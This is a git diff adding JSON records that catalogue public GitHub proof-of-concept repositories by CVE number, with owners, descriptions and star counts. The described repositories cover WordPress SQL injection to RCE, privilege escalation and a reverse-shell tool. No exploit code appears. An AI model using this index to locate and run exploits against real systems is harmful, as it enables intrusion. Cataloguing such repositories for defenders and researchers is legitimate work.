"topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-27665.json b/2024/CVE-2024-27665.json new file mode 100644 index 0000000000..e289c92783 --- /dev/null +++ b/2024/CVE-2024-27665.json @@ -0,0 +1,33 @@ +[ + { + "id": 770180757, + "name": "CVE-2024-27665", + "full_name": "Thirukrishnan\/CVE-2024-27665", + "owner": { + "login": "Thirukrishnan", + "id": 63901950, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63901950?v=4", + "html_url": "https:\/\/github.com\/Thirukrishnan", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Thirukrishnan\/CVE-2024-27665", + "description": null, + "fork": false, + "created_at": "2024-03-11T04:46:19Z", + "updated_at": "2024-03-11T04:46:19Z", + "pushed_at": "2024-03-11T09:55:15Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-27673.json b/2024/CVE-2024-27673.json new file mode 100644 index 0000000000..89c5d18c3f --- /dev/null +++ b/2024/CVE-2024-27673.json @@ -0,0 +1,33 @@ +[ + { + "id": 781524986, + "name": "CVE-2024-27673", + "full_name": "Alaatk\/CVE-2024-27673", + "owner": { + "login": "Alaatk", + "id": 21007805, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21007805?v=4", + "html_url": "https:\/\/github.com\/Alaatk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Alaatk\/CVE-2024-27673", + "description": "ASUS Control Center Express =< 01.06.15 - Unquoted Service Path", + "fork": false, + "created_at": "2024-04-03T14:47:20Z", + "updated_at": "2024-04-17T11:50:01Z", + "pushed_at": "2024-04-03T15:00:48Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-27674.json b/2024/CVE-2024-27674.json new file mode 100644 index 0000000000..c9d4aabf77 --- /dev/null +++ b/2024/CVE-2024-27674.json @@ -0,0 +1,33 @@ +[ + { + "id": 781539000, + "name": "CVE-2024-27674", + "full_name": "Alaatk\/CVE-2024-27674", + "owner": { + "login": "Alaatk", + "id": 21007805, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21007805?v=4", + "html_url": "https:\/\/github.com\/Alaatk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Alaatk\/CVE-2024-27674", + "description": "Macro Expert <= 4.9.4 - Insecure Permissions Privilege Escalation", + "fork": false, + "created_at": "2024-04-03T15:16:09Z", + "updated_at": "2024-04-17T11:53:20Z", + "pushed_at": "2024-04-03T15:20:29Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-27697.json b/2024/CVE-2024-27697.json new file mode 100644 index 0000000000..4455998d8b --- /dev/null +++ b/2024/CVE-2024-27697.json @@ -0,0 +1,33 @@ +[ + { + "id": 769730947, + "name": "FuguHub-8.4-Authenticated-RCE-CVE-2024-27697", + "full_name": "SanjinDedic\/FuguHub-8.4-Authenticated-RCE-CVE-2024-27697", + "owner": { + "login": "SanjinDedic", + "id": 20748723, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20748723?v=4", + "html_url": "https:\/\/github.com\/SanjinDedic", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SanjinDedic\/FuguHub-8.4-Authenticated-RCE-CVE-2024-27697", + "description": "Arbitrary Code Execution on FuguHub 8.4", + "fork": false, + "created_at": "2024-03-09T22:24:03Z", + "updated_at": "2024-11-28T09:26:23Z", + "pushed_at": "2024-03-11T03:09:35Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 5, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-27766.json b/2024/CVE-2024-27766.json new file mode 100644 index 0000000000..caa449cbfe --- /dev/null +++ b/2024/CVE-2024-27766.json @@ -0,0 +1,33 @@ +[ + { + "id": 608607257, + "name": "CVE-2024-27766", + "full_name": "Ant1sec-ops\/CVE-2024-27766", + "owner": { + "login": "Ant1sec-ops", + "id": 98224710, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/98224710?v=4", + "html_url": "https:\/\/github.com\/Ant1sec-ops", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Ant1sec-ops\/CVE-2024-27766", + "description": "Database authenticated code execution", + "fork": false, + "created_at": "2023-03-02T11:20:48Z", + "updated_at": "2024-10-18T17:50:40Z", + "pushed_at": "2024-09-04T13:14:45Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-27804.json b/2024/CVE-2024-27804.json new file mode 100644 index 0000000000..bfe134276d --- /dev/null +++ b/2024/CVE-2024-27804.json @@ -0,0 +1,33 @@ +[ + { + "id": 800535361, + "name": "CVE-2024-27804", + "full_name": "R00tkitSMM\/CVE-2024-27804", + "owner": { + "login": "R00tkitSMM", + "id": 78787782, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78787782?v=4", + "html_url": "https:\/\/github.com\/R00tkitSMM", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/R00tkitSMM\/CVE-2024-27804", + "description": "POC for CVE-2024-27804", + "fork": false, + "created_at": "2024-05-14T14:17:06Z", + "updated_at": "2024-11-14T22:49:15Z", + "pushed_at": "2024-05-14T14:55:23Z", + "stargazers_count": 132, + "watchers_count": 132, + "has_discussions": false, + "forks_count": 25, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 25, + "watchers": 132, + "score": 0, + "subscribers_count": 6 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-27815.json b/2024/CVE-2024-27815.json new file mode 100644 index 0000000000..0b18e37a62 --- /dev/null +++ b/2024/CVE-2024-27815.json @@ -0,0 +1,33 @@ +[ + { + "id": 817512745, + "name": "CVE-2024-27815", + "full_name": "jprx\/CVE-2024-27815", + "owner": { + "login": "jprx", + "id": 36464332, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36464332?v=4", + "html_url": "https:\/\/github.com\/jprx", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jprx\/CVE-2024-27815", + "description": "macOS\/ XNU kernel buffer overflow. Introduced in macOS 14.0 (xnu-10002.1.13), fixed in macOS 14.5 (xnu-10063.121.3)", + "fork": false, + "created_at": "2024-06-19T22:03:02Z", + "updated_at": "2024-11-21T19:08:38Z", + "pushed_at": "2024-06-20T17:23:22Z", + "stargazers_count": 35, + "watchers_count": 35, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 35, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-27821.json b/2024/CVE-2024-27821.json new file mode 100644 index 0000000000..fa1c9c9cce --- /dev/null +++ b/2024/CVE-2024-27821.json @@ -0,0 +1,33 @@ +[ + { + "id": 890033348, + "name": "CVE-2024-27821", + "full_name": "0xilis\/CVE-2024-27821", + "owner": { + "login": "0xilis", + "id": 109871561, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/109871561?v=4", + "html_url": "https:\/\/github.com\/0xilis", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xilis\/CVE-2024-27821", + "description": "Writeup and PoC of CVE-2024-27821, for education purposes.", + "fork": false, + "created_at": "2024-11-17T20:56:41Z", + "updated_at": "2024-11-18T02:53:18Z", + "pushed_at": "2024-11-17T21:43:36Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-27914.json b/2024/CVE-2024-27914.json new file mode 100644 index 0000000000..c74e61851c --- /dev/null +++ b/2024/CVE-2024-27914.json @@ -0,0 +1,33 @@ +[ + { + "id": 767361191, + "name": "CVE-2024-27914", + "full_name": "shellkraft\/CVE-2024-27914", + "owner": { + "login": "shellkraft", + "id": 89618500, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/89618500?v=4", + "html_url": "https:\/\/github.com\/shellkraft", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/shellkraft\/CVE-2024-27914", + "description": null, + "fork": false, + "created_at": "2024-03-05T06:43:51Z", + "updated_at": "2024-11-07T06:48:04Z", + "pushed_at": "2024-03-05T14:31:10Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-27954.json b/2024/CVE-2024-27954.json new file mode 100644 index 0000000000..7272514c89 --- /dev/null +++ b/2024/CVE-2024-27954.json @@ -0,0 +1,64 @@ +[ + { + "id": 880016834, + "name": "CVE-2024-27954", + "full_name": "gh-ost00\/CVE-2024-27954", + "owner": { + "login": "gh-ost00", + "id": 153366162, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/153366162?v=4", + "html_url": "https:\/\/github.com\/gh-ost00", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gh-ost00\/CVE-2024-27954", + "description": "Automatic Plugin for WordPress < 3.92.1 Multiples Vulnerabilities", + "fork": false, + "created_at": "2024-10-29T00:46:35Z", + "updated_at": "2024-11-22T08:54:40Z", + "pushed_at": "2024-10-29T02:47:13Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 880766464, + "name": "CVE-2024-27954", + "full_name": "Quantum-Hacker\/CVE-2024-27954", + "owner": { + "login": "Quantum-Hacker", + "id": 140636140, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/140636140?v=4", + "html_url": "https:\/\/github.com\/Quantum-Hacker", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Quantum-Hacker\/CVE-2024-27954", + "description": null, + "fork": false, + "created_at": "2024-10-30T10:14:54Z", + "updated_at": "2024-10-30T10:33:37Z", + "pushed_at": "2024-10-30T10:32:57Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-27956.json b/2024/CVE-2024-27956.json new file mode 100644 index 0000000000..e882c05eb5 --- /dev/null +++ b/2024/CVE-2024-27956.json @@ -0,0 +1,435 @@ +[ + { + "id": 792712180, + "name": "CVE-2024-27956", + "full_name": "truonghuuphuc\/CVE-2024-27956", + "owner": { + "login": "truonghuuphuc", + "id": 20487674, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20487674?v=4", + "html_url": "https:\/\/github.com\/truonghuuphuc", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/truonghuuphuc\/CVE-2024-27956", + "description": " CVE-2024-27956 WordPress Automatic < 3.92.1 - Unauthenticated SQL Injection", + "fork": false, + "created_at": "2024-04-27T11:03:36Z", + "updated_at": "2024-11-24T20:58:05Z", + "pushed_at": "2024-04-27T11:37:02Z", + "stargazers_count": 18, + "watchers_count": 18, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 18, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 794368729, + "name": "CVE-2024-27956-RCE", + "full_name": "diego-tella\/CVE-2024-27956-RCE", + "owner": { + "login": "diego-tella", + "id": 70545257, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70545257?v=4", + "html_url": "https:\/\/github.com\/diego-tella", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/diego-tella\/CVE-2024-27956-RCE", + "description": "PoC for SQL Injection in CVE-2024-27956", + "fork": false, + "created_at": "2024-05-01T01:58:28Z", + "updated_at": "2024-11-20T16:30:45Z", + "pushed_at": "2024-05-03T11:28:21Z", + "stargazers_count": 83, + "watchers_count": 83, + "has_discussions": false, + "forks_count": 25, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 25, + "watchers": 83, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 795600666, + "name": "CVE-2024-27956-WORDPRESS-RCE-PLUGIN", + "full_name": "X-Projetion\/CVE-2024-27956-WORDPRESS-RCE-PLUGIN", + "owner": { + "login": "X-Projetion", + "id": 161194427, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/161194427?v=4", + "html_url": "https:\/\/github.com\/X-Projetion", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/X-Projetion\/CVE-2024-27956-WORDPRESS-RCE-PLUGIN", + "description": "CVE-2024-27956 WORDPRESS RCE PLUGIN", + "fork": false, + "created_at": "2024-05-03T16:19:19Z", + "updated_at": "2024-05-03T16:31:26Z", + "pushed_at": "2024-05-03T16:31:23Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 796391975, + "name": "CVE-2024-27956", + "full_name": "FoxyProxys\/CVE-2024-27956", + "owner": { + "login": "FoxyProxys", + "id": 166161106, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/166161106?v=4", + "html_url": "https:\/\/github.com\/FoxyProxys", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/FoxyProxys\/CVE-2024-27956", + "description": null, + "fork": false, + "created_at": "2024-05-05T19:50:54Z", + "updated_at": "2024-05-15T15:36:53Z", + "pushed_at": "2024-05-15T15:36:50Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 797161822, + "name": "CVE-2024-27956", + "full_name": "k3ppf0r\/CVE-2024-27956", + "owner": { + "login": "k3ppf0r", + "id": 63085409, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63085409?v=4", + "html_url": "https:\/\/github.com\/k3ppf0r", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/k3ppf0r\/CVE-2024-27956", + "description": "CVE-2024-27956", + "fork": false, + "created_at": "2024-05-07T10:07:00Z", + "updated_at": "2024-05-07T14:32:42Z", + "pushed_at": "2024-05-07T14:32:38Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 800537570, + "name": "WordPress-Auto-Admin-Account-and-Reverse-Shell-cve-2024-27956", + "full_name": "AiGptCode\/WordPress-Auto-Admin-Account-and-Reverse-Shell-cve-2024-27956", + "owner": { + "login": "AiGptCode", + "id": 146197697, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/146197697?v=4", + "html_url": "https:\/\/github.com\/AiGptCode", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AiGptCode\/WordPress-Auto-Admin-Account-and-Reverse-Shell-cve-2024-27956", + "description": "WordPress Auto Admin Account Creation and Reverse Shell cve-2024-27956 automates the process of creating a new administrator account in a WordPress site and executing a reverse shell on the target server. It utilizes the wp-automatic plugin's CSV injection vulnerability to execute SQL queries", + "fork": false, + "created_at": "2024-05-14T14:21:49Z", + "updated_at": "2024-11-26T12:43:39Z", + "pushed_at": "2024-07-01T09:29:02Z", + "stargazers_count": 94, + "watchers_count": 94, + "has_discussions": false, + "forks_count": 23, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "android", + "backdoor", + "backdoors", + "cve", + "exploit", + "hack", + "hacking", + "html", + "nuclei", + "nuclei-templates", + "php", + "ransomware", + "rce", + "reverse-shell", + "shell", + "website", + "windows", + "wordpress", + "wordpress-plugin" + ], + "visibility": "public", + "forks": 23, + "watchers": 94, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 800894301, + "name": "CVE-2024-27956-RCE-File-Package", + "full_name": "W3BW\/CVE-2024-27956-RCE-File-Package", + "owner": { + "login": "W3BW", + "id": 169884248, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/169884248?v=4", + "html_url": "https:\/\/github.com\/W3BW", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/W3BW\/CVE-2024-27956-RCE-File-Package", + "description": null, + "fork": false, + "created_at": "2024-05-15T07:48:54Z", + "updated_at": "2024-05-15T08:11:52Z", + "pushed_at": "2024-05-15T08:11:48Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 811676044, + "name": "CVE-2024-27956", + "full_name": "Cappricio-Securities\/CVE-2024-27956", + "owner": { + "login": "Cappricio-Securities", + "id": 102907425, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102907425?v=4", + "html_url": "https:\/\/github.com\/Cappricio-Securities", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Cappricio-Securities\/CVE-2024-27956", + "description": "WordPress Automatic Plugin <= 3.92.0 - SQL Injection", + "fork": false, + "created_at": "2024-06-07T04:40:06Z", + "updated_at": "2024-06-27T14:25:23Z", + "pushed_at": "2024-06-24T10:43:34Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2024-27956", + "cve-2024-27956-exploit", + "cve-2024-27956-poc", + "cve-2024-27956-scanner", + "sql-injection", + "sqli", + "wordpress", + "wp-scan", + "wp-sqli" + ], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 812538942, + "name": "MASS-CVE-2024-27956", + "full_name": "itzheartzz\/MASS-CVE-2024-27956", + "owner": { + "login": "itzheartzz", + "id": 172171370, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/172171370?v=4", + "html_url": "https:\/\/github.com\/itzheartzz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/itzheartzz\/MASS-CVE-2024-27956", + "description": null, + "fork": false, + "created_at": "2024-06-09T07:21:44Z", + "updated_at": "2024-10-29T13:50:22Z", + "pushed_at": "2024-06-09T16:37:41Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 814427157, + "name": "Valve-Press-CVE-2024-27956-RCE", + "full_name": "TadashiJei\/Valve-Press-CVE-2024-27956-RCE", + "owner": { + "login": "TadashiJei", + "id": 154245504, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/154245504?v=4", + "html_url": "https:\/\/github.com\/TadashiJei", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TadashiJei\/Valve-Press-CVE-2024-27956-RCE", + "description": "Valve Press - CVE-2024-27956-RCE - SQL Injection", + "fork": false, + "created_at": "2024-06-13T02:05:31Z", + "updated_at": "2024-06-13T02:07:39Z", + "pushed_at": "2024-06-13T02:07:35Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 815017516, + "name": "CVE-2024-27956-RCE", + "full_name": "cve-2024\/CVE-2024-27956-RCE", + "owner": { + "login": "cve-2024", + "id": 172750025, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/172750025?v=4", + "html_url": "https:\/\/github.com\/cve-2024", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cve-2024\/CVE-2024-27956-RCE", + "description": null, + "fork": false, + "created_at": "2024-06-14T07:13:54Z", + "updated_at": "2024-06-14T07:15:39Z", + "pushed_at": "2024-06-14T07:15:36Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 827369395, + "name": "CVE-2024-27956", + "full_name": "ThatNotEasy\/CVE-2024-27956", + "owner": { + "login": "ThatNotEasy", + "id": 25004320, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25004320?v=4", + "html_url": "https:\/\/github.com\/ThatNotEasy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ThatNotEasy\/CVE-2024-27956", + "description": "Perform with massive Wordpress SQLI 2 RCE", + "fork": false, + "created_at": "2024-07-11T14:17:23Z", + "updated_at": "2024-10-30T04:42:06Z", + "pushed_at": "2024-07-11T14:20:59Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 832540537, + "name": "EXPLOITING-CVE-2024-27956", + "full_name": "CERTologists\/EXPLOITING-CVE-2024-27956", + "owner": { + "login": "CERTologists", + "id": 176203032, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/176203032?v=4", + "html_url": "https:\/\/github.com\/CERTologists", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CERTologists\/EXPLOITING-CVE-2024-27956", + "description": null, + "fork": false, + "created_at": "2024-07-23T08:24:56Z", + "updated_at": "2024-07-23T08:27:15Z", + "pushed_at": "2024-07-23T08:27:13Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-27971.json b/2024/CVE-2024-27971.json new file mode 100644 index 0000000000..ee2805b97a --- /dev/null +++ b/2024/CVE-2024-27971.json @@ -0,0 +1,33 @@ +[ + { + "id": 795532767, + "name": "CVE-2024-27971-Note", + "full_name": "truonghuuphuc\/CVE-2024-27971-Note", + "owner": { + "login": "truonghuuphuc", + "id": 20487674, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20487674?v=4", + "html_url": "https:\/\/github.com\/truonghuuphuc", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/truonghuuphuc\/CVE-2024-27971-Note", + "description": "CVE-2024-27971 WordPress Premmerce Permalink Manager for WooCommerce Plugin <= 2.3.10 is vulnerable to Local File Inclusion", + "fork": false, + "created_at": "2024-05-03T13:38:33Z", + "updated_at": "2024-06-26T12:03:55Z", + "pushed_at": "2024-05-03T14:43:31Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-27972.json b/2024/CVE-2024-27972.json new file mode 100644 index 0000000000..b7f8e1dadc --- /dev/null +++ b/2024/CVE-2024-27972.json @@ -0,0 +1,33 @@ +[ + { + "id": 802518507, + "name": "CVE-2024-27972-Poc", + "full_name": "truonghuuphuc\/CVE-2024-27972-Poc", + "owner": { + "login": "truonghuuphuc", + "id": 20487674, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20487674?v=4", + "html_url": "https:\/\/github.com\/truonghuuphuc", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/truonghuuphuc\/CVE-2024-27972-Poc", + "description": "CVE-2024-27972 WP Fusion Lite <= 3.41.24 - Authenticated (Contributor+) Remote Code Execution", + "fork": false, + "created_at": "2024-05-18T14:17:34Z", + "updated_at": "2024-06-26T12:03:36Z", + "pushed_at": "2024-05-18T14:40:59Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-27983.json b/2024/CVE-2024-27983.json new file mode 100644 index 0000000000..31078b8cba --- /dev/null +++ b/2024/CVE-2024-27983.json @@ -0,0 +1,33 @@ +[ + { + "id": 786410918, + "name": "CVE-2024-27983-nodejs-http2", + "full_name": "lirantal\/CVE-2024-27983-nodejs-http2", + "owner": { + "login": "lirantal", + "id": 316371, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/316371?v=4", + "html_url": "https:\/\/github.com\/lirantal", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lirantal\/CVE-2024-27983-nodejs-http2", + "description": "CVE-2024-27983 this repository builds up a vulnerable HTTP2 Node.js server (`server-nossl.js`) based on CVE-2024-27983 which exploits a continuation flood vulnerability in HTTP2 servers.", + "fork": false, + "created_at": "2024-04-14T11:34:52Z", + "updated_at": "2024-11-07T02:13:19Z", + "pushed_at": "2024-04-14T11:35:23Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 5, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-28000.json b/2024/CVE-2024-28000.json new file mode 100644 index 0000000000..e760260ce2 --- /dev/null +++ b/2024/CVE-2024-28000.json @@ -0,0 +1,166 @@ +[ + { + "id": 846839815, + "name": "CVE-2024-28000", + "full_name": "Alucard0x1\/CVE-2024-28000", + "owner": { + "login": "Alucard0x1", + "id": 3710918, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3710918?v=4", + "html_url": "https:\/\/github.com\/Alucard0x1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Alucard0x1\/CVE-2024-28000", + "description": "LiteSpeed Cache Privilege Escalation PoC", + "fork": false, + "created_at": "2024-08-24T05:12:56Z", + "updated_at": "2024-11-20T16:31:02Z", + "pushed_at": "2024-08-25T03:06:56Z", + "stargazers_count": 15, + "watchers_count": 15, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 15, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 847379986, + "name": "CVE-2024-28000", + "full_name": "ebrasha\/CVE-2024-28000", + "owner": { + "login": "ebrasha", + "id": 9009001, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9009001?v=4", + "html_url": "https:\/\/github.com\/ebrasha", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ebrasha\/CVE-2024-28000", + "description": "LiteSpeed Cache Privilege Escalation PoC - CVE-2024-28000", + "fork": false, + "created_at": "2024-08-25T16:57:24Z", + "updated_at": "2024-09-02T08:37:09Z", + "pushed_at": "2024-09-02T08:08:39Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": true, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "abdal", + "cve-2024-28000", + "ebrasha", + "exploit", + "litespeed-cache-privilege", + "poc", + "privilege-escalation-poc", + "wordpress" + ], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 848127480, + "name": "CVE-2024-28000", + "full_name": 